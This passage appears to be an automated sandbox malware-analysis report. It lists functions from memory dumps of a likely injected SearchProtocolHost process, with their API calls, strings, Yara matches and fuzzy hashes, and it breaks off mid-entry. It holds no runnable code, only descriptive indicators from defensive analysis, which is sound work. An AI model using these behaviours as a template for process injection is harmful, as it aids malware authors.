                                                    Function 03552D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9722941f284c86ce211e2b358131065fb654f1749f6d4ed5ef44a66c2458fe8b
                                                    • Instruction ID: 301c3115797d7946cc90c3af2708ff851a08370568b4402e16f85daa8629aa99
                                                    • Opcode Fuzzy Hash: 9722941f284c86ce211e2b358131065fb654f1749f6d4ed5ef44a66c2458fe8b
                                                    • Instruction Fuzzy Hash: 0490026130140403D140B15868186064045E7E1311F59D011E8414655CDA1589565222
                                                    Function 03552DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b858a77b5af68b72458b4b94b1d301383683a3cfe8d553f5d59c350910467108
                                                    • Instruction ID: 2943498015d0b3b7231db3fa262e476ed2d2f9d6a1548dbb30397f8d01c1fd2c
                                                    • Opcode Fuzzy Hash: b858a77b5af68b72458b4b94b1d301383683a3cfe8d553f5d59c350910467108
                                                    • Instruction Fuzzy Hash: C3900261342445525545F15858045074046A7E0251799C012A9414A51C86269956D621
                                                    Function 03552DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7804d52cd8af4a49cf7c4534a0d3d0ddd3838fe3e838b018c0ebdf49969775af
                                                    • Instruction ID: 2b909a80c51521b629e017ec9013ef1cd449e1ffedd987717e86e185501cdfb6
                                                    • Opcode Fuzzy Hash: 7804d52cd8af4a49cf7c4534a0d3d0ddd3838fe3e838b018c0ebdf49969775af
                                                    • Instruction Fuzzy Hash: FE90027130140813D111B1585904707004997D0251F99C412A8424659D97568A52A121
                                                    Function 03552C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f6dbf033be7adc76a9ab6e8b5dfc42b82d2a4e0751c63dbf9e8abff8703375b5
                                                    • Instruction ID: 273f90de64573d8a4e36e1105b95af59361936c50999a74878b1ac7d3b730675
                                                    • Opcode Fuzzy Hash: f6dbf033be7adc76a9ab6e8b5dfc42b82d2a4e0751c63dbf9e8abff8703375b5
                                                    • Instruction Fuzzy Hash: 6890027130148C02D110B158980474A004597D0311F5DC411AC424759D879589917121
                                                    Function 03552C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 71292bd07cf06566b053a94928ebe434c0ec6880c7aa66bf2addc50bf26e9e1c
                                                    • Instruction ID: d9bd7812734bab54ad0ac62e028b51348c5f1dfcaca3a0efec73ab0a043958d2
                                                    • Opcode Fuzzy Hash: 71292bd07cf06566b053a94928ebe434c0ec6880c7aa66bf2addc50bf26e9e1c
                                                    • Instruction Fuzzy Hash: 8D90027130140C42D100B1585804B46004597E0311F59C016A8124755D8715C9517521
                                                    Function 03552CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a7f1540160e3b7c99dfbda94cee6b4c3ea4f86f3dfa5aab11f24c058fe7619d8
                                                    • Instruction ID: f44e798f877b463499196c5670ac7dfd06a7bc604ba5f8cb79e732fcd0871c4b
                                                    • Opcode Fuzzy Hash: a7f1540160e3b7c99dfbda94cee6b4c3ea4f86f3dfa5aab11f24c058fe7619d8
                                                    • Instruction Fuzzy Hash: EA90027130140802D100B5986808646004597E0311F59D011AD024656EC76589916131
                                                    Function 035535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 49ff05668172f7ef967d6341fb7c37d8442b2d81d64fd586bef162d91b7da136
                                                    • Instruction ID: b663b08023e6899beb440b1be5f2d5e2aca1ce85fbb09f870d821fccaa41f2d2
                                                    • Opcode Fuzzy Hash: 49ff05668172f7ef967d6341fb7c37d8442b2d81d64fd586bef162d91b7da136
                                                    • Instruction Fuzzy Hash: 0D90027170550802D100B1585914706104597D0211F69C411A8424669D87958A5165A2
                                                    Function 035539B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 10be00ad5f827346f50aef45d7b75544cbc7e2d1e3cbbbe013274dc77c044eef
                                                    • Instruction ID: 738dd54e6432c7ad64b6b434e5736c43beaffcf2854f3f8ce268f21c2c3a291a
                                                    • Opcode Fuzzy Hash: 10be00ad5f827346f50aef45d7b75544cbc7e2d1e3cbbbe013274dc77c044eef
                                                    • Instruction Fuzzy Hash: 1A90026134545502D150B15C58046164045B7E0211F59C021A8814695D865589556221
                                                    Function 009F1098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 520 9f1098-9f110e call a0b810 call a0c220 call 9f4820 call 9e13f0 call a01e20 531 9f1130-9f1135 520->531 532 9f1110-9f1121 PostThreadMessageW 520->532 532->531 533 9f1123-9f112d 532->533 533->531
                                                    APIs
                                                    • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 009F111D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: sE716IK71M$sE716IK71M
                                                    • API String ID: 1836367815-922563818
                                                    • Opcode ID: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                    • Instruction ID: 1c8132204211ec74bb932501c82c7e46dee89ac6451c595af6a50f90e49979e7
                                                    • Opcode Fuzzy Hash: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                    • Instruction Fuzzy Hash: 0A110431E4025C76EB21ABA09C42FEF7B7C9F41790F008054FB047B2C1D6786A068BE1
                                                    Function 009F10A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 534 9f10a0-9f10b0 535 9f10b9-9f110e call a0c220 call 9f4820 call 9e13f0 call a01e20 534->535 536 9f10b4 call a0b810 534->536 545 9f1130-9f1135 535->545 546 9f1110-9f1121 PostThreadMessageW 535->546 536->535 546->545 547 9f1123-9f112d 546->547 547->545
                                                    APIs
                                                    • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 009F111D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: sE716IK71M$sE716IK71M
                                                    • API String ID: 1836367815-922563818
                                                    • Opcode ID: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                    • Instruction ID: 4db1d99dcc6bfcdabb1a671c44a91581f5499ea3020570dcd774b7bcbf27532e
                                                    • Opcode Fuzzy Hash: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                    • Instruction Fuzzy Hash: A5019671E4121C76EB21A7A49D02FEF7B7C9F45B90F048054FB047B1C1E6786A068BE5
                                                    Function 00A03C40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 00A03D1B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    • Opcode ID: bd11e206bd162b61418908fde7cc6af85e48e0b7f9bbc4e4d4f4751761957dee
                                                    • Instruction ID: 7fb2c533f1bd7166bafaafc4e947f8da1cc7c97b7c0fa83bb2f79f6e6aa17117
                                                    • Opcode Fuzzy Hash: bd11e206bd162b61418908fde7cc6af85e48e0b7f9bbc4e4d4f4751761957dee
                                                    • Instruction Fuzzy Hash: 6131C571A00609BBD714EFA4DC81FEBBBB8EB88310F10451DF61D9B281D3706640CBA1
                                                    Function 009FF72A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeUninitialize
                                                    • String ID: @J7<
                                                    • API String ID: 3442037557-2016760708
                                                    • Opcode ID: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                    • Instruction ID: df3199f7d6853f5b8315e3f079c55cb611c4602481673035ee72d65269e70a56
                                                    • Opcode Fuzzy Hash: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                    • Instruction Fuzzy Hash: FE311076A0060E9FDB00DFD8D8809EFB7B9BF88304B108569E605AB354D775AE058BA0
                                                    Function 009FF730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeUninitialize
                                                    • String ID: @J7<
                                                    • API String ID: 3442037557-2016760708
                                                    • Opcode ID: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                    • Instruction ID: 3a969c2b8c8cc61d1578e979e1d6b0a500de9c06055c3cfd839d502f2e48946f
                                                    • Opcode Fuzzy Hash: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                    • Instruction Fuzzy Hash: 253110B6A0060E9FDB00DFD8D8809EFB7B9BF88304B108559E615EB354D775EE458BA0
                                                    Function 009F48DC Relevance: 1.6, APIs: 1, Instructions: 91libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009F4892
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                    • Instruction ID: cf5887e13d74f5deede209f793d7d6732d528e31db1e9d38fdc518caf6fbb032
                                                    • Opcode Fuzzy Hash: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                    • Instruction Fuzzy Hash: 9421447254864E9BCB01DEF8DC41BF6B764CF45324F104798DDACEB1D1EA215D018782
                                                    Function 009F4819 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009F4892
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                    • Instruction ID: 49d2bfe3058a7760ba915dff02c11b1b805a58c6455c095548a9f7abd034602d
                                                    • Opcode Fuzzy Hash: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                    • Instruction Fuzzy Hash: 0E01B5B5E4010DABDF10DBA0EC42FAEB7789B14318F0042A8EA189B2C1F631E715C791
                                                    Function 009F4820 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009F4892
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                    • Instruction ID: 57503149541ae0a562fd510518ab02273712efce57636473b27aea5bed96c74a
                                                    • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                    • Instruction Fuzzy Hash: 200125B5D0020DA7DF10DBE4ED42F9EB7789B54348F004195EA0897281F631EB54C791
                                                    Function 00A09AC0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,009F85DE,00000010,?,?,?,00000044,?,00000010,009F85DE,?,?,?), ref: 00A09B23
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                    • Instruction ID: fe74c1dbe5e4df7f198424c452c4ee39a328b4816d560545858d4b2a3d337865
                                                    • Opcode Fuzzy Hash: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                    • Instruction Fuzzy Hash: 6B01C0B2210108BBCB04DE99DC81EDB77ADAF8C754F008208BA09A7240D630F8518BA5
                                                    Function 009E9E40 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009E9E81
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 897b5008a066ca781a9f9edfdb1018c822e6dcf4366a4ba6e097ef57d074295b
                                                    • Instruction ID: de6d082218a14e1d601d67db4880551e98251426b1f1aae297e95c16d848774d
                                                    • Opcode Fuzzy Hash: 897b5008a066ca781a9f9edfdb1018c822e6dcf4366a4ba6e097ef57d074295b
                                                    • Instruction Fuzzy Hash: 93F06D7338020436E73176AEAC03FDBB78CCBC5BB1F140026FA0CEA1C1D8A6B84146A5
                                                    Function 009E9E3E Relevance: 1.5, APIs: 1, Instructions: 31threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009E9E81
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 9e635f60936242cedb424141fa78a542287fe07c6d5069c1c1935485f0b75a4b
                                                    • Instruction ID: 64e0a16ec5e69a47cfd59d9f4f9c10ecc6b7a0f857cb720163dcffa668a9f213
                                                    • Opcode Fuzzy Hash: 9e635f60936242cedb424141fa78a542287fe07c6d5069c1c1935485f0b75a4b
                                                    • Instruction Fuzzy Hash: A7E0D87324024032E33176DD9D03FDF679C8FC4760F250055FB08AB1C1D8A5B84047A4
                                                    Function 00A099E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(009F1D39,?,00A05AD7,009F1D39,00A0582F,00A05AD7,?,009F1D39,00A0582F,00001000,?,?,00000000), ref: 00A09A1F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                    • Instruction ID: 34391581f041b32e41e75d0fe91dcbeca119cd8844ca8908e30ea5bbb8cb9cf1
                                                    • Opcode Fuzzy Hash: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                    • Instruction Fuzzy Hash: E8E039722003057BD610EA59DC41EAB37ACEF89754F004409F909A7281D770B9108AB5
                                                    Function 00A09A30 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,7CB0E851,00000007,00000000,00000004,00000000,009F40A6,000000F4), ref: 00A09A6F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                    • Instruction ID: 2f5c76499223ee2ec6efa64f5481e8fc5e6a2f1acc15ea4179f9a09d539036e0
                                                    • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                    • Instruction Fuzzy Hash: 8EE065722003487BCB10EE99DC42FEB37ACEFC9754F00441AF909A7282D670B9108AB5
                                                    Function 009F8619 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 009F8648
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: f738cbb425e611d8e9e269ad94cf466be0197022c3636d257a479034ed59d302
                                                    • Instruction ID: 7842fc9dd4617563fd64baa0c0b924487bf289fa7113c669aa79fca388fc41b1
                                                    • Opcode Fuzzy Hash: f738cbb425e611d8e9e269ad94cf466be0197022c3636d257a479034ed59d302
                                                    • Instruction Fuzzy Hash: FBE04F7124020867EB686B68DC86BB633588F49761F144A50FE6DDF2C2DA78E9124290
                                                    Function 009F8620 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 009F8648
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 855b8d50a8016bda6a6a97f31ff92b957c90bbdca47c53022890a0e2a56f69ba
                                                    • Instruction ID: 70d8ee60f68b115b7ae213e69786423f208f94bc8615b9fb4f47738f32dc3fbd
                                                    • Opcode Fuzzy Hash: 855b8d50a8016bda6a6a97f31ff92b957c90bbdca47c53022890a0e2a56f69ba
                                                    • Instruction Fuzzy Hash: 61E0867124020C6BEB5466A8DC47B77335CCF48765F144A50F92CDF2C1D979F9024250
                                                    Function 009F8407 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,009F2030,00A0816F,00A0582F,009F1FF6), ref: 009F843F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 119c9e1f68007de04e482f7eb05232315956690a884a29b287f5bc2f0f46cb40
                                                    • Instruction ID: 0ea6f89f78d01c441c664bce19ddcdf5ec8e99e0e70bd427e265d5ecbd76b130
                                                    • Opcode Fuzzy Hash: 119c9e1f68007de04e482f7eb05232315956690a884a29b287f5bc2f0f46cb40
                                                    • Instruction Fuzzy Hash: 67E0C2306802863AF741FBA48D42B6A3B8A9B54744F14004CB948E62C2CD28E1108A21
                                                    Function 009F8410 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,009F2030,00A0816F,00A0582F,009F1FF6), ref: 009F843F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
